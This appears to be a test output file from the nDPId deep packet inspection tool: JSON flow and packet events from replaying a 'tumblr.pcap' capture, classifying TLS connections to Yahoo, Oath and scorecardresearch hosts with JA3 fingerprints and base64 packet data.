-00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105197,"flow_last_seen":1605292105197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105197,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605292105197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105197,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OYAAAAAoAL9IHL6AAACBAWgBAIIClFT82IAAAAAAQMDBw=="} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605292105230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105230,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDMLhfl2n7vTnoBJXgHalAAACBAV4AQMDAwQCCArC3Z3zUVPzYg=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605292105230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105230,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OfC4X5egBAB+\/qVAAABAQgKUVPzg8LdnfM="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105274,"flow_last_seen":1605292105274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605292105274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105274,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZYAAAAAoAL9IG8jAAACBAWgBAIIClFT868AAAAAAQMDBw=="} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105299,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDobnvZrixr2XoBJXgG87AAACBAV4AQMDAwQCCArC3Z5DUVPzrw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105299,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZeG572bgBAB+\/MzAAABAQgKUVPzyMLdnkM="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105418,"flow_last_seen":1605292105418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105418,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605292105418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105418,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3sAAAAAoAL9IOHqAAACBAWgBAIIChNm5EYAAAAAAQMDBw=="} -00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105433,"flow_last_seen":1605292105433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105433,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605292105433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105433,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACgGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5MAAAAAoAL9IMKvAAACBAWgBAIICr4D0hAAAAAAAQMDBw=="} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605292105447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105447,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY8Go+Ou0O5ht8oBJXgIDEAAACBAV4AQMDAwQCCArC3Z7YE2bkRg=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605292105447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105447,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3xqPjrugBAB+wS5AAABAQgKE2bkY8Ldntg="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105459,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSABSZgAFAgAAAAAAAAAEAEqAcsBIEmLB5kd7IUo3\/YpAbu4DgNW0a1gJBeUoBJXgDGmAAACBAV4AQMDAwQCCArC3Z7jvgPSEA=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105459,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACAGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5QDVtGugBAB+7WdAAABAQgKvgPSKsLdnuM="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAJgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOk4W2C\/9gBhA0URlAAABAQgKBcmbq8LdLRcXAwMAcysuUqnNdP5CtlTC2pWvfZyUMV8UFocs8M6W09NnsspPibPhqobMFIm1f0B4kk13U59rzTyXjGQM3JpbSJkQg4GGmBSNMo7KgMloXnt3GygjcT75OOC0YPo3\/MFdKUwkpDu47ubalsF7IwgRDAn\/l0DFoLo="} -00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOsYW2C\/9gBhA0ehRAAABAQgKBcmbrMLdLRcXAwMAIgQb59HIMHYAgoaCAJqbMMjq72ntBt\/\/eGErLyXH34Iczsk="} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":215,"pkt_l4_len":161,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAKEGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOu0W2C\/9gBhA0aEtAAABAQgKBcmbrMLdLRcXAwMAfBkhBkIFqMuMKjD1\/xjqGp2hEKMP3ziLomYjJXbyDDBzMNKC8MmFqfqAj9+xvxfAO7rBldu4UpazYVXmg399TnFcypI7qckvMpQyy6kehQ5F75J5BlTYjgokme9I6h8+9mS8Y6D2WQEp5qh0Ix9\/vReZo1xT0xocl8k7wFQ="} 
-00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":213,"pkt_l4_len":159,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAJ8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npntnZTJergBgB9damAAABAQgKLIniTsLdLfkXAwMAepLzP8oRHbXAD5D56fW\/ezxXNRxKdaqM6BwQpjw0zyORx06Rl8gHWinoWY19NxmIXl2owLgVHJ\/UEVkHmda\/PMinu6FgCqLeUi5RUsVJaGqL1ulKRH6Mi5nxYau2z9M9f+jUaBIVXH47AOoxy+jPs5YTh+8Es3OdfTIr"} -00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npn1jZTJergBgB9c+fAAABAQgKLIniTsLdLfkXAwMAInb0OIEXDizCLxamWTiLwYinYzi396zhkwGnl1I5tNs4gXU="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605292105774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105774,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATAMqAcsBIEmLB5kd7IUo3\/YpAbvKotlMl6u56Z9YgBALghHTAAABAQgKwt2gFiyJ4k4="} 
